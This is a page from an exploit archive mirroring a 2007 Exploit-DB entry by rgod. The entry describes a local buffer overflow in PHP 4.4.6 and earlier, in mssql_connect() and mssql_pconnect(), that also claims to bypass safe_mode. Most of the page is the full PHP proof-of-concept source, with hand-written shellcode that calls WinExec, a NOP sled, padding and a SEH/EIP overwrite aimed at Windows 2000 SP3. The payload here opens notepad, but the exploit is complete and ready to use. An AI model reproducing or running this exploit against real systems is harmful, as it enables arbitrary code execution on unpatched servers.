Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
PHP - exploit.company
header-logo
Suggest Exploit
vendor:
PHP
by:
rgod
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: PHP
Affected Version From: PHP <= 4.4.6
Affected Version To: PHP <= 4.4.6
Patch Exists: NO
Related CWE:
CPE: a:php:php:4.4.6
Metasploit:
Other Scripts:
Platforms Tested: Windows 2000 SP3 EN
2007

PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow

This exploit targets the mssql_connect() and mssql_pconnect() functions in PHP versions <= 4.4.6. It allows for local buffer overflow and can also bypass the safe_mode restriction. The exploit is specific to Windows 2000 SP3 EN with a SEH overwrite. It was created by rgod as a contribution to MOPB.

Mitigation:

Upgrade PHP to a version higher than 4.4.6.
Source

Exploit-DB raw data:

<?php

// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow
// poc exploit (and safe_mode bypass)
// windows 2000 sp3 en / seh overwrite
// by rgod
// site: http://retrogod.altervista.org

// u can easily adjust for php5
// this as my little contribute to MOPB

$____scode=
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\xca\x73\xe9\x77". //WinExec
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\x5c\xcf\xe9\x77". //ExitProcess
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"start notepad & ";

   $eip="\xdc\xf5\x12";
   $____suntzu=str_repeat("\x90",100);
   $____suntzu.=$____scode;
   $____suntzu.=str_repeat("a",2460 - strlen($____scode));
   $____suntzu.=$eip;
   mssql_pconnect($____suntzu);

?>

# milw0rm.com [2007-03-05]